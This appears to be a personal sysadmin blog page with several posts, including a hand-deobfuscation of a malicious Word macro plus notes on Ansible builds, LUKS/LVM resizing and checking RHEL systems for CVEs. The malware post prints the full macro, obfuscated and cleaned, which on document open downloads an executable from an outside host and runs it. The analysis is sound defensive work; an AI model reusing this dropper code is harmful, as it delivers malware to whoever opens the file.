Moving my blog to

I’ve decided it’s time to give my blog a better name.  While has served me well for a little over 7 years, it is a bit of a mouthful to communicate to someone.  So — I am now moving my blogging activities to  And as moving my blog doesn’t make much sense if I don’t actually use it – I will be looking to blog a bit more frequently (blogging more frequently than 18 month intervals is a pretty low goal to aim for).  So, please update your bookmarks and RSS readers to point to, and follow me on Twitter @rhmjs to get notified whenever I post a new entry.


Compliance and the Cloud, at Red Hat Summit

For many, the discussion is not “should I use the public cloud?”; rather it is “how and when do I leverage the public cloud?”. This is not a boolean decision: there is no need to turn off your existing data center simply because you have decided to adopt the public cloud. Hybrid Cloud and Multi Cloud strategies are increasingly common — identify the subset of workloads that you consider reasonable for public cloud, determine whether moving them to a public cloud will provide cost benefits (e.g., periodic or “bursty” workloads), and expand your operation to the public cloud for just those workloads.

Generally, there are three concerns to be addressed in selecting workloads: cost, performance, and security/compliance.

Cost and performance requirements are fairly quantitative, and relatively easy to analyze.

But there is a real challenge in maintaining a consistent security and compliance posture across this expanded infrastructure. Whether moving 1 or 2 workloads to the public cloud or 90% of your infrastructure, the ability to maintain security patches, apply consistent access control, generate compliance reports, and detect and apply configuration changes is critical.

We have a great set of sessions lined up in our Security Track at Red Hat Summit this year, addressing these concerns and more. “Compliance, security automation, and remediation with Red Hat CloudForms, Red Hat Satellite, and Ansible Tower by Red Hat” will provide guidance on maintaining a consistent compliance posture across private and public cloud. “Identity management for cloud and hybrid cloud environments with Red Hat and Microsoft” will discuss maintaining uniform identity between Azure Active Directory Domain Services and your Red Hat Enterprise Linux systems. And “Middleware security: Authentication, authorization, and auditing services” will introduce our new Single Sign-On solution, based on Keycloak, for federated authorization across your applications, regardless of where they are hosted.

I will be blogging and tweeting (@rhmjs) all through Summit. And if you are joining us in San Francisco, please make sure to come find me at the Red Hat Booth! Hope to see you there!


Red Hat Chief Architect, Northeast Commercial

So … this happened today:

Matt Smith – Chief Architect, Northeast Commercial
Matt will be taking on the role of Chief Architect for the Northeast team under Sean Spurrier. He has been at Red Hat for 3 years in an Account SA role most recently covering some of our larger Financial Services customers along with being the IDM SME team lead and resident security guru. He has had a great impact on the emerging technology and consulting business of the Northeast and last year won a Chairman’s award as well. He joined us from the University of Connecticut and lives with his wife, 4 children and log chopping machine in the hinterlands of Eastern Connecticut.

I gotta admit — I’ve never been more humbled.  Red Hat is an incredible organization, with incredible people and incredible goals.  To be able to make an impact in such an organization is truly rewarding, and to be recognized with such an opportunity is awesome.

Can you tell I enjoy working here?

Maybe you should too:




Deobfuscating malware by hand

Somehow, I became the proud new owner of a piece of (somewhat) malicious code tonight.  After making sure it was properly neutered, and after running it through VirusTotal and being surprised by how few engines (9/55) were detecting it, I decided to take a look.

Sub HCYh58Llju(ByRef iKvmUvcYr3wp, ByVal Q3REKGitD, ByVal kwoeg8c)
 iKvmUvcYr3wp = Split(Q3REKGitD, kwoeg8c)
End Sub

Sub S1HL1_C(ByVal LL3FDJzJgC, ByVal cOdzspoHpj)
 On Error Resume Next
 xDyHfiQQsRQ8 = cOdzspoHpj.responseBody
 LL3FDJzJgC.Write xDyHfiQQsRQ8
End Sub

Sub AutoOpen()
 On Error Resume Next
 Dim HUiu827TYRH
 HUiu827TYRH = StrReverse(StrReverse(StrReverse("m" & "d" & " " & "/")))
 Const KMKM = "km "
 Const CCCC = " c"

 Dim q7bPJ655QjSG
 HCYh58Llju q7bPJ655QjSG, StrReverse("|exe.tsohnvs\etadpUdnW\%ATADPPA%|exe.605ild/stsop/moc.34oledsmanilad//:ptth|maertS.BDODA|PTTHLMX.tfosorciM|llehS"), "|"

 Dim nPtKNIjU35IQ
 Set nPtKNIjU35IQ = CreateObject("W" & StrReverse("tpircS") & "." & StrReverse("llehS"))
 C4KAAHcn = nPtKNIjU35IQ.ExpandEnvironmentStrings(q7bPJ655QjSG(4))

 jnF1QSEGIA = Split(C4KAAHcn, "\")
 R9Z8D2tPkYNy = UBound(jnF1QSEGIA)
 nPtKNIjU35IQ.Run "c" & StrReverse(KMKM & CCCC & HUiu827TYRH) & StrReverse("rid") & " """ & Mid(C4KAAHcn, 1, Len(C4KAAHcn) - Len(jnF1QSEGIA(R9Z8D2tPkYNy))) & """", 0, True

 Set v8t0w6fxasM = CreateObject(q7bPJ655QjSG(1))
 v8t0w6fxasM.Open Chr$(71) + Chr$(69) + Chr$(84), q7bPJ655QjSG(3), False
 v8t0w6fxasM.setRequestHeader "Cache-Control", "no-cache, no-store"

 Set n7nUrIZKvU2A = CreateObject(q7bPJ655QjSG(2))
 n7nUrIZKvU2A.Type = 1
 Application.Run "S1HL1_C", n7nUrIZKvU2A, v8t0w6fxasM
 Application.Run "h2xPVFcahn", n7nUrIZKvU2A, C4KAAHcn
 nPtKNIjU35IQ.Run "c" & StrReverse(""" """" trats" & " c" & HUiu827TYRH) & C4KAAHcn & """", 0, False
End Sub

Function h2xPVFcahn(ByVal n7nUrIZKvU2ATMP, ByVal C4KAAHcnTMP)
 n7nUrIZKvU2ATMP.SaveToFile C4KAAHcnTMP, 2
End Function

Sub Workbook_Open()
 On Error Resume Next
End Sub

Oh noes .. it’s teh crypted!!!  No, of course not.  Someone just thought they’d be funny and obfuscate this to make it a bit tougher to figure out what they’ve done.  Because, you know, StrReverse(StrReverse(StrReverse(…))) is 3 times better than a single StrReverse!!

So anyway, sarcasm aside (yeah, right), this is nothing more difficult than the cryptoquote in your Sunday newspaper or the (really great!) puzzles at the end of every Gravity Falls episode.

So let’s get out the text editor and start doing some simple search and replace.

First — let’s remove all the silly StrReverse functions.  It’s pretty easy to pick out the most interesting, and reverse it from the CLI:

Please mentally ignore all occurrences of “<DONT_GO_HERE>” — I just injected them because I didn’t trust this blog to not automagically make those URLs clickable.

$ echo "|exe.tsohnvs\etadpUdnW\%ATADPPA%|exe.605ild/stsop/moc.34oledsmanilad//:ptth|maertS.BDODA|PTTHLMX.tfosorciM|llehS" | rev


Of course, this now makes it pretty obvious that the subroutine named “HCYh58Llju” is just taking a string delimited by “|” and splitting it up into an array — so do a quick “s/HCYh58Llju/splitter_func/” on the file, just to make it easier to read.

The rest of the steps are pretty easy to follow — just keep finding easy string concatenation or reversal, and do a search and replace on obfuscated names once you figure out what they do.  Here is the final result of my analysis:

' Sub splitter_func(ByRef splitted, ByVal urlstr, ByVal separator)
'  splitted = Split(urlstr, separator)
' End Sub
Sub write_xmlhttp_response_to_stream_func(ByVal adodb_objTMP, ByVal xmlhttp_objTMP)
 On Error Resume Next
 xml_responsebody_obj = xmlhttp_objTMP.responseBody
 adodb_objTMP.Write xml_responsebody_obj
End Sub
Sub AutoOpen()
 On Error Resume Next
 Dim HUiu827TYRH
 HUiu827TYRH = "/ dm"
 Const KMKM = "km "
 Const CCCC = " c"
 Dim splitted_data
 ' splitter_func splitted_data, "Shell|Microsoft.XMLHTTP|ADODB.Stream|http://dal<DONT_GO_HERE><DONT_GO_HERE>m/posts/dli506.exe|%APPDATA%\WndUpdate\svnhost.exe|", "|"
 Dim wscript_shell_obj
 Set wscript_shell_obj = CreateObject("WScript.Shell")
 wndupd_location_str = wscript_shell_obj.ExpandEnvironmentStrings("%APPDATA%\WndUpdate\svnhost.exe")
 wndupd_location_parts = Split(wndupd_location_str, "\")
 highest_index_of_wndupd_loc_parts = UBound(wndupd_location_parts)
 ' MJS: Make a directory in APPDATA
 wscript_shell_obj.Run "cmd /c mkdir ""%APPDATA%\WndUpdate\""", 0, True
 ' Fetch the second stage over HTTP into a binary ADODB.Stream
 Set xmlhttp_obj = CreateObject("Microsoft.XMLHTTP")
 xmlhttp_obj.Open "GET", "http://dal<DONT_GO_HERE>inamsdelo<DONT_GO_HERE>43.c<DONT_GO_HERE>om/posts/dli506.exe", False
 xmlhttp_obj.setRequestHeader "Cache-Control", "no-cache, no-store"
 Set adodb_obj = CreateObject("ADODB.Stream")
 adodb_obj.Type = 1   ' 1 = adTypeBinary
 Application.Run "write_xmlhttp_response_to_stream_func", adodb_obj, xmlhttp_obj
 Application.Run "save_stream_to_file_func", adodb_obj, wndupd_location_str
 ' Run the dropped file; the original builds this as: cmd /c start "" "<path>"
 wscript_shell_obj.Run "cmd /c start """" ""%APPDATA%\WndUpdate\svnhost.exe""", 0, False
End Sub
Function save_stream_to_file_func(ByVal adodb_objTMP, ByVal wndupd_location_strTMP)
 adodb_objTMP.SaveToFile wndupd_location_strTMP, 2   ' 2 = adSaveCreateOverWrite
End Function
Sub Workbook_Open()
 On Error Resume Next
End Sub
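The search-and-replace steps described above, done in a script instead of by hand. This is an added example, not code from the original post: it folds `"a" & "b"` concatenation, `Chr$()` sequences and nested `StrReverse()` calls into plain literals, inlines names that are assigned exactly once, and then applies analyst-chosen renames. `SAMPLE` is constructed from a few lines of the macro above (the URL line is left out on purpose), and `RENAMES` and all function names are my own.

```python
import re
LIT = r'"((?:[^"]|"")*)"'      # a VBA string literal; "" inside it is an escaped quote
DEF = re.compile(r'^\s*(?:Const\s+)?(\w+)\s*=\s*' + LIT + r'\s*$')   # name = "one literal"
vb_escape = lambda s: s.replace('"', '""')
vb_unescape = lambda s: s.replace('""', '"')
def fold_chr(line):   # Chr(71) / Chr$(71) -> "G"
    return re.sub(r'Chr\$?\((\d+)\)', lambda m: '"%s"' % vb_escape(chr(int(m.group(1)))), line)

def fold_concat(line):   # "a" & "b" or "a" + "b" -> "ab", one pair at a time until stable
    pat = re.compile(LIT + r'\s*[&+]\s*' + LIT)
    while (new := pat.sub(lambda m: '"%s%s"' % (m.group(1), m.group(2)), line, count=1)) != line:
        line = new
    return line

def fold_strreverse(line):   # StrReverse("lit") -> reversed literal; innermost first, so nesting unwinds
    pat = re.compile(r'StrReverse\(\s*' + LIT + r'\s*\)')
    rev = lambda m: '"%s"' % vb_escape(vb_unescape(m.group(1))[::-1])
    while (new := pat.sub(rev, line, count=1)) != line:
        line = new
    return line

def fold_line(line):   # apply all three folds until nothing changes
    while (new := fold_strreverse(fold_concat(fold_chr(line)))) != line:
        line = new
    return line

def deobfuscate(src, renames=None):
    """Fold string tricks, inline names bound to a single literal, then apply analyst renames."""
    lines = [fold_line(l) for l in src.splitlines()]
    bound = {m.group(1): '"%s"' % m.group(2) for l in lines if (m := DEF.match(l))}
    out = []
    for l in lines:
        if not DEF.match(l) and not re.match(r'^\s*(Dim|Const)\b', l):
            for name, lit in bound.items():      # assumes each name is assigned exactly once
                l = re.sub(r'\b%s\b' % re.escape(name), lit, l)
            l = fold_line(l)
        out.append(l)
    text = '\n'.join(out)
    for old, new in (renames or {}).items():
        text = re.sub(r'\b%s\b' % re.escape(old), new, text)
    return text
# Constructed sample: lines from the macro above, with the URL line left out on purpose
SAMPLE = ''' HUiu827TYRH = StrReverse(StrReverse(StrReverse("m" & "d" & " " & "/")))
 Const KMKM = "km "
 Const CCCC = " c"
 Set nPtKNIjU35IQ = CreateObject("W" & StrReverse("tpircS") & "." & StrReverse("llehS"))
 nPtKNIjU35IQ.Run "c" & StrReverse(KMKM & CCCC & HUiu827TYRH) & StrReverse("rid") & " """ & C4KAAHcn & """", 0, True
 v8t0w6fxasM.Open Chr$(71) + Chr$(69) + Chr$(84), q7bPJ655QjSG(3), False'''
RENAMES = {'nPtKNIjU35IQ': 'wscript_shell_obj', 'C4KAAHcn': 'appdata_exe_path'}   # analyst-chosen
```

`print(deobfuscate(SAMPLE, RENAMES))` shows the `mkdir` command assembled exactly as the macro builds it, including the double space the hand transcription above drops.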


This was a stupid exercise.  All this script does is create a directory in %APPDATA%, download a file from a random site, name it svnhost.exe locally, and then execute that file.  Pretty straightforward stage 1 payload.  The real fun, of course, is in analyzing stage 2.  But I’ll leave that for the pros ….


Building Ansible 2.0 RPM on Fedora 23

I want to use some of the new extras modules (especially virt_net and virt_pool), so here are my notes on building the Ansible 2.0 RPM for Fedora 23.

sudo dnf install asciidoc rpm-build python-devel
git clone git:// --recursive
cd ansible/
make rpm
sudo dnf -y install ./rpm-build/ansible-2.*.noarch.rpm

ansible --version

One note — it is possible I already installed some packages necessary for building Ansible, and so the list of packages I installed may not be sufficient.  If you stumble across any, please let me know and I will update this post.


Resizing an LVM PV + LUKS volume on a live Fedora 23 system

I just installed Fedora 23 on a new laptop, happily clicking my way through the GUI installer.  The installer very nicely partitioned my disks into a small boot partition and a larger LUKS-encrypted volume, created an LVM PV from that LUKS-encrypted volume, then carved out several LVs for /, /home, etc.  Everything was up and running within 15 minutes, and I’d started copying over my files from my old laptop.

Then … I decide to create a new LV to hold my VM images, and suddenly realize I forgot to tell the installer to use all available storage for my PV!  I see this:

fdisk -l
 Disk /dev/sda: 238.5 GiB, 256060514304 bytes, 500118192 sectors
 Device Boot Start End Sectors Size Id Type
 /dev/sda1 * 2048 1026047 1024000 500M 83 Linux
 /dev/sda2 1026048 226492415 225466368 107.5G 83 Linux

I have around 120GB of space where I could create a new PV … but I really want a single PV of 238 GiB.  And heck, this is a new laptop install, worst case is everything blows up and I lose an hour.

Fixing this was surprisingly easy!

** These steps may very well delete any and all data on your hard drive, and render your system unable to boot.  If you value your data, make backups.  Proceed with caution **

Adjust the partition boundary using fdisk

# fdisk /dev/sda

Welcome to fdisk (util-linux 2.27.1).
Command (m for help): p
Disk /dev/sda: 238.5 GiB, 256060514304 bytes, 500118192 sectors
/dev/sda1 * 2048 1026047 1024000 500M 83 Linux
/dev/sda2 1026048 226492415 225466368 107.5G 83 Linux

Command (m for help): d 
Partition number (1,2, default 2): 2

Partition 2 has been deleted.

Command (m for help): n
Partition type
 p primary (1 primary, 0 extended, 3 free)
 e extended (container for logical partitions)
Select (default p): p
Partition number (2-4, default 2): 
First sector (1026048-500118191, default 1026048): 
Last sector, +sectors or +size{K,M,G,T,P} (1026048-500118191, default 500118191): 

Created a new partition 2 of type 'Linux' and of size 238 GiB.

Command (m for help): w
The partition table has been altered.
Calling ioctl() to re-read partition table.

# partprobe -s
/dev/sda: msdos partitions 1 2

Adjust the LUKS volume size

# cryptsetup resize luks-a522aeb6-2526-4868-82ba-c36b01dc5d53

Adjust the LVM PV size

# pvscan
PV /dev/mapper/luks-a522aeb6-2526-4868-82ba-c36b01dc5d53 VG fedora lvm2 [107.51 GiB / 8.00 MiB free]
Total: 1 [107.51 GiB] / in use: 1 [107.51 GiB] / in no VG: 0 [0 ]

# pvresize /dev/mapper/luks-a522aeb6-2526-4868-82ba-c36b01dc5d53
Physical volume "/dev/mapper/luks-a522aeb6-2526-4868-82ba-c36b01dc5d53" changed
1 physical volume(s) resized / 0 physical volume(s) not resized

# pvscan
PV /dev/mapper/luks-a522aeb6-2526-4868-82ba-c36b01dc5d53 VG fedora lvm2 [237.98 GiB / 130.48 GiB free]
Total: 1 [237.98 GiB] / in use: 1 [237.98 GiB] / in no VG: 0 [0 ]

And that’s it!  I now have a VG composed of a single PV occupying the entire drive!
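A pre-flight check for the fdisk step above, as an added example that is not part of the original post. The LUKS header sits in the first sectors of the partition, so deleting and recreating it is only safe if the new partition keeps exactly the same start sector; this script compares the `fdisk -l` lines captured before and after and refuses anything else. `check_grow`, its helpers and the recreated-partition line used in the check are mine.

```shell
#!/bin/sh
# Inputs are single lines copied from "fdisk -l" output before and after the
# delete-and-recreate step, plus the "Disk /dev/sda: ... N sectors" header line.

# "<start> <end>" from an fdisk -l partition line, ignoring a "*" boot flag
part_bounds() {
    echo "$1" | sed 's/\*//' | awk '{print $2, $3}'
}

# last usable sector from the "Disk ...: ... N sectors" header line
disk_last_sector() {
    echo "$1" | awk '{print $(NF-1) - 1}'
}

# check_grow "<old partition line>" "<new partition line>" "<Disk header line>"
# returns 0 only when NEW keeps OLD's start sector, ends later, and fits on the disk
check_grow() {
    set -- $(part_bounds "$1") $(part_bounds "$2") "$(disk_last_sector "$3")"
    old_start=$1; old_end=$2; new_start=$3; new_end=$4; last=$5
    if [ "$old_start" != "$new_start" ]; then
        echo "REFUSE: start sector moved $old_start -> $new_start; the LUKS header would be lost" >&2
        return 1
    fi
    if [ "$new_end" -le "$old_end" ]; then
        echo "REFUSE: partition did not grow ($old_end -> $new_end)" >&2
        return 1
    fi
    if [ "$new_end" -gt "$last" ]; then
        echo "REFUSE: new end $new_end is past the last sector $last" >&2
        return 1
    fi
    echo "OK: start $old_start unchanged, end $old_end -> $new_end"
}

# Sample input: the old line and header are from the post; the new line is constructed.
DISK_LINE='Disk /dev/sda: 238.5 GiB, 256060514304 bytes, 500118192 sectors'
OLD_PART='/dev/sda2 1026048 226492415 225466368 107.5G 83 Linux'
NEW_PART='/dev/sda2 1026048 500118191 499092144 238G 83 Linux'
check_grow "$OLD_PART" "$NEW_PART" "$DISK_LINE"
```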


How to determine if your Red Hat Enterprise Linux 7 system is vulnerable to a specific CVE

Let’s say we are looking to determine if our system is vulnerable to Heartbleed or LogJam.

# ls /usr/lib64/*
/usr/lib64/ /usr/lib64/
# yum info openssl
Installed Packages
Name : openssl
Arch : x86_64
Epoch : 1
Version : 1.0.1e
Release : 42.el7_1.9
Size : 1.5 M
Repo : installed
From repo : rhel-7-server-rpms
Summary : Utilities from the general purpose cryptography library with TLS implementation
License : OpenSSL
Description : The OpenSSL toolkit provides support for secure communications between
 : machines. OpenSSL includes a certificate management tool and shared
 : libraries which provide various cryptographic algorithms and
 : protocols.

Note that “Version” is 1.0.1e, but that only denotes the upstream version Red Hat based the release on. Since that release, Red Hat has backported many later bug fixes, security fixes, etc.; that backport level is exposed by the “Release” value, 42.el7_1.9.

Using Heartbleed (CVE-2014-0160) as the example:
“Red Hat Enterprise Linux 7 include OpenSSL version openssl-1.0.1e-34.el7 which includes a fix backported from openssl-1.0.1g”

Each specific CVE can be checked directly on Red Hat’s site.

You can also check directly on the command line. For example, checking for Heartbleed you would use:

# yum updateinfo list installed --cve CVE-2014-0160

This will show any installed RPM packages that apply to Heartbleed. But note — nothing will be returned on a RHEL 7 system, because the original RPM released with RHEL 7 was not vulnerable, so no additional package needed to be installed to fix it.

Logjam, though, is a little more interesting.

# yum updateinfo list installed --cve CVE-2015-4000
RHSA-2015:1229 Critical/Sec. java-1.7.0-openjdk-1:
RHSA-2015:1229 Critical/Sec. java-1.7.0-openjdk-1:
RHSA-2015:1229 Critical/Sec. java-1.7.0-openjdk-headless-1:
RHSA-2015:1185 Moderate/Sec. nss-3.19.1-3.el6_6.x86_64
RHSA-2015:1185 Moderate/Sec. nss-3.19.1-3.el7_1.x86_64
RHSA-2015:1185 Moderate/Sec. nss-sysinit-3.19.1-3.el6_6.x86_64
RHSA-2015:1185 Moderate/Sec. nss-sysinit-3.19.1-3.el7_1.x86_64
RHSA-2015:1185 Moderate/Sec. nss-tools-3.19.1-3.el6_6.x86_64
RHSA-2015:1185 Moderate/Sec. nss-tools-3.19.1-3.el7_1.x86_64
RHSA-2015:1185 Moderate/Sec. nss-util-3.19.1-1.el6_6.x86_64
RHSA-2015:1185 Moderate/Sec. nss-util-3.19.1-1.el7_1.x86_64
RHSA-2015:1072 Moderate/Sec. openssl-1.0.1e-30.el6_6.9.x86_64
RHSA-2015:1072 Moderate/Sec. openssl-1:1.0.1e-42.el7_1.6.x86_64
RHSA-2015:1072 Moderate/Sec. openssl-libs-1:1.0.1e-42.el7_1.6.x86_64

Each of those RHSAs addressed Logjam. You can get a lot more information by using:

# yum updateinfo info installed --cve CVE-2015-4000

Note the use of “installed” in these commands. This shows information only about packages that are already installed. If you remove “installed”, you will see information only about packages that /could/ be installed.
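The Version/Release comparison above, worked in code as an added example that is not from the original post: `is_fixed()` parses `name-epoch:version-release` strings, compares them the way rpm does (a Python port of rpmvercmp’s segment ordering), and `parse_updateinfo()` groups `yum updateinfo list` lines by advisory. Assumptions, all mine: epochs are compared only when both strings carry one (advisory text such as `openssl-1.0.1e-34.el7` omits the epoch the package really has), and `^` ordering is not implemented.

```python
import re

def rpmvercmp(a, b):
    """Port of rpm's rpmvercmp segment ordering (no '^' support): returns -1, 0 or 1."""
    if a == b:
        return 0
    seg = r'\d+|[A-Za-z]+|~'
    sa, sb = re.findall(seg, a), re.findall(seg, b)
    for x, y in zip(sa, sb):
        if '~' in (x, y):                  # '~' sorts before anything, even end of string
            if x != y:
                return -1 if x == '~' else 1
            continue
        if x.isdigit() != y.isdigit():     # a numeric segment is always newer than an alpha one
            return 1 if x.isdigit() else -1
        if x.isdigit():
            x, y = int(x), int(y)
        if x != y:
            return 1 if x > y else -1
    if len(sa) == len(sb):
        return 0
    longer, a_longer = (sa, True) if len(sa) > len(sb) else (sb, False)
    if longer[min(len(sa), len(sb))] == '~':    # a trailing '~' makes the longer side older
        a_longer = not a_longer
    return 1 if a_longer else -1
NEVRA = re.compile(r'^(.+?)-(?:(\d+):)?([^-]+)-([^-]+?)(?:\.(?:x86_64|i686|noarch))?$')
def parse_nevra(s):
    """'openssl-1:1.0.1e-42.el7_1.9.x86_64' -> (name, epoch or None, version, release)."""
    return NEVRA.match(s).groups()

def evr_cmp(a, b):
    (_, ea, va, ra), (_, eb, vb, rb) = parse_nevra(a), parse_nevra(b)
    # Assumption: compare epochs only when both strings carry one; advisory text
    # such as "openssl-1.0.1e-34.el7" omits the epoch that the RPM really has.
    if ea is not None and eb is not None and int(ea) != int(eb):
        return 1 if int(ea) > int(eb) else -1
    return rpmvercmp(va, vb) or rpmvercmp(ra, rb)

def is_fixed(installed, fixed_in):
    """True if the installed package is at or past the build where the fix was backported."""
    return evr_cmp(installed, fixed_in) >= 0
def parse_updateinfo(text):
    """Group 'yum updateinfo list' lines by advisory: {'RHSA-2015:1072': ['openssl-1:...'], ...}."""
    out = {}
    for line in text.splitlines():
        m = re.match(r'^(RH[SBE]A-\d+:\d+)\s+\S+\s+(\S+)$', line.strip())
        if m:
            out.setdefault(m.group(1), []).append(m.group(2))
    return out
```

With the values from this post, `is_fixed('openssl-1:1.0.1e-42.el7_1.9', 'openssl-1.0.1e-34.el7')` is true even though both carry Version 1.0.1e, which is exactly why the Release field, not the Version, answers the question.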


Removing Thunderbird’s Titlebar in Gnome Shell

I spend most of my day in front of Google Chrome, Mozilla Thunderbird, and Gnome Terminal on my RHEL 7 desktop running Gnome Shell. Chrome’s ability to hide the system titlebar creates a pretty slick and efficient desktop, so I’ve been craving the same for Thunderbird. Luck (and a little bit of Google-fu) just brought me to the Pixel Saver Gnome Shell extension. Works like a champ, thank you @deadalnix !



Adding to my collection of BSOD’s I’ve seen while traveling, I saw this one at Heathrow Airport earlier today.


I find it strangely interesting that the 90° rotation isn’t maintained by the BSOD …



Ok, so it’s happened.  I am now using Twitter professionally.  Come follow me @rhmjs!
